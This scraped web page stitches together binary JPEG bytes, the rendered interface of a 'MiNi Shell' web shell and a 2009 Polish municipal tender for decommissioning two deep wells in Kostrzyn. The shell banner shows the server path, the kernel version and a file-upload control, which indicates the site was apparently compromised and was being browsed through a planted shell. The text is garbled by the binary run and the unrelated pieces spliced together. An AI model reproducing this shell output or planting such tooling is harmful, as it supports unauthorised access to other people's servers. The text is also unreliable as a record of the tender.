JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090224/38704-N-2009.html

<p class="kh_header"><b>Kostrzyn: Przetarg nieograniczony na likwidację 2 szt. studni głębinowych,studnia nr 1 i 1 A znajdujących się w Kostrzynie przy ul.Słowackiego.</b><br>
<b>Numer ogłoszenia: 38704 - 2009; data zamieszczenia: 24.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Komunalny , ul. Poznańska 2, 62-025 Kostrzyn, woj. wielkopolskie, tel. 0618178239, faks 061 8970908.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Administracyjna Jednostki Samorządu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na likwidację 2 szt. studni głębinowych,studnia nr 1 i 1 A znajdujących się w Kostrzynie przy ul.Słowackiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1.Opracowanie projektów prac geologicznych na likwidacje 2 szt. studni nr 1 /o głębokości 133,5 m,rok wykonania 1963,rura O 355 mm/ oraz nr 1A /o głębokości 130 m, rok wykonania 1990,rura O 355 mm / usytuowanych w Kostrzynie przy ul.Słowackiego w oparciu o dane techniczne studni zawarte w  załączonych kopiach kart otworów oraz danych uzyskanych w wyniku wizji lokalnej (termin wizji uzgodnić z Zamawiającym).
2.Projekty opracować z uwzględnieniem wyciągnięcia kolumny filtracyjnej oraz rur okładzinowych zabudowanych.
3.Projekt wykonać zgodnie z przepisami Ustawy z dnia 4 lutego 1994 r. -Prawo Geologiczne i Górnicze (Dz.U. nr 27, poz 96) z późniejszymi zmianami oraz Rozporządzeniem Ministra Środowiska z dnia 19 grudnia 2001 r. w sprawie projektów prac geologicznych (Dz.U.Nr 153 z 2001 r.,poz.1777).
4.Projekt przedstawić do akceptacji Zamawiającemu.
5.Po uzyskaniu akceptacji projekt przedłożyć w odpowiednim organie administracji geologicznej i uzyskać decyzje urzędową o zatwierdzeniu projektu.
6.Dla opisywanego zadania należy uzyskać wszystkie obowiązujące decyzje od właściwych inwestycji oraz opracować operaty wodnoprawne i uzyskać pozwolenia wodnoprawne na likwidację studni głębinowych.
7.Projekty należy wykonać w 6 egzemplarzach.
8.Po uzyskaniu niezbędnych pozwoleń wykonać fizyczną likwidację dwóch studni zgodnie z projektem i uzyskaną decyzją, pod nadzorem osoby z odpowiednimi uprawnieniami. Należy zlikwidować zarówno otwory studzienne, jak również obudowy wykonane z kręgów betonowych przykrytych włazami betonowymi. Wydobyte kręgi i betony należy zutylizować w odpowiednich składowiskach uzyskując potwierdzenie pisemne o utylizacji odpadów. Należy zlikwidować przyłącza do przedmiotowych studni na odległość 3 m od obudowy, końcówki przyłączy szczelnie zaślepić. Miejsce likwidacji zrekultywować (należy przewidzieć uzupełnienie dołów po obudowach studni ziemią, miejsce po studniach oznaczyć reperami wykonanych z słupków betonowych z oznaczeniem daty likwidacji i nr studni.
9.Wykonać dokumentację geologiczną likwidowanych studni wraz z mapkami  inwentaryzacyjnymi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.22.20-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca wniesie wadium w wysokości: 900,00 zł.
1.W zależności od woli Wykonawcy wadium może być wnoszone w formach:
Pieniądza,Poręczeniach bankowych,Gwarancjach bankowych,Gwarancjach ubezpieczeniowych,Poręczeniach  udzielonych  przez  podmioty,  o  których  mowa  w  art.6b ust.5 pkt.2 ustawy z 9.11.2000 r. o utworzeniu PARP (Dz. U. Nr  109  poz. 1158  wraz  z późniejszymi zmianami).
2.Wadium  wnoszone  w  pieniądzu  należy  wpłacić  przelewem  na  rachunek  bankowy Zamawiającego w Banku Spółdzielczym w Kostrzynie  nr 61 9075 0009 0008 5560 0130 9793   Potwierdzeniem  tej  formy  wniesienia  wadium  będzie  kopia przelewu  (wpłaty)       załączona  do  oferty.
3.Wadium zostanie zwrócone,  jeżeli:
      a)  upłynął termin związania ofertą,
      b)  zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania  umowy,
     c)  Zamawiający  unieważnił  postępowanie  o  udzielenie  zamówienia,  a  protesty  zostały ostatecznie  rozstrzygnięte  lub  upłynął  termin  do ich wnoszenia.
4.  Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy:
a)  który wycofał ofertę przed upływem terminu składania ofert,
b)  który został wykluczony z postępowania,
c)  którego oferta została odrzucona.
5.   Złożenie przez Wykonawcę,  którego  oferta  została  odrzucona  lub  wykluczonego  z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez niego prawa do wniesienia protestu.
6. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi  z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty  prowadzenia rachunku bankowego oraz 	prowizji bankowej za przelew pieniędzy na rachunek  bankowy wskazany przez Wykonawcę.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została  wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.  Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie Wykonawcy przez Zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 2. Warunki szczegółowe wymagane od wykonawców :
2.1. Wykonawca musi dysponować :
a)pracownikami posiadającymi odpowiednie kwalifikacje zawodowe,
b)osobą (osobami)  wyznaczoną na  kierownika  budowy (robót) posiadającą uprawnienia  do  pełnienia samodzielnych funkcji w budownictwie w zakresie kierowania i nadzorowania robót wodociągowo-kanalizacyjnych i należąca  (-ymi) do właściwej Izby Inżynierów Budownictwa,
2.2.Wykonawca w okresie prowadzonej przez siebie działalności (z okresu ostatnich pięciu lat) wykonał z należytą starannością co najmniej  dwa zamówienia poparte referencjami lub innymi dokumentami potwierdzającymi to,i o charakterze związanym  z zakresem zamówienia , o którym mowa w punkcie III niniejszej SIWZ.  (doświadczenie podwykonawcy nie będzie brane pod uwagę),
2.3.Wykonawca posiada ważną polisę ubezpieczeniową lub inny dokument ubezpieczeniowy w zakresie prowadzenia swojej działalności, związanej z przedmiotem zamówienia, 
2.4.Informacja w zakresie wykonania zamówienia przez podwykonawców, Zamawiający przewiduje możliwości udziału podwykonawców pod warunkiem załączenia prze Wykonawcę do składanej  przez niego oferty wykazu robót, które zamierza powierzyć podwykonawcom. W przypadku braku wykazu robót, których wykonanie  Wykonawca zamierza powierzyć podwykonawcom Zamawiający przyjmuje, ze Wykonawca wykona wszystkie roboty we własnym zakresie. W takim przypadku całkowitą odpowiedzialność za realizacje zamówienia ponosić będzie Wykonawca.
3.Ocena spełnienia warunków w postępowaniu o zamówienie publiczne 
Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych dokumentów na zasadzie:spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:
1. Dokumenty wymagane:
a)aktualny odpis z właściwego  rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji
działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania
ofert, (tj. wystawiony po dniu 20.09.2008 r.),
b)dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów
prawa lub innych dokumentów rejestrowych,
c)oświadczenie do postępowania o udzielenie zamówienia publicznego z art. 22 ust.1  ustawy Prawo zamówień publicznych z wykorzystaniem wzoru- zawartym w załączniku nr 1 do SIWZ.
d)wypełniony i podpisany formularz ofertowy (zał. nr 1 do SIWZ).
e)wypełniony i podpisany kosztorys ofertowy (zał. nr 4 do SIWZ)
f)zaparafowany wzór umowy - każda zapisana strona (zał. Nr 2 do SIWZ), jako akceptacja warunków
w niej zawartych.
g)polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, obejmującej roboty na które Wykonawca złożył ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kostrzyn.wlkp.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Komunalny
62-025 Kostrzyn
ul.Poznańska 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 09:00, miejsce: Zakład Komunalny
ul.Poznanska 2
62-025 Kostrzyn
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 18.04.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com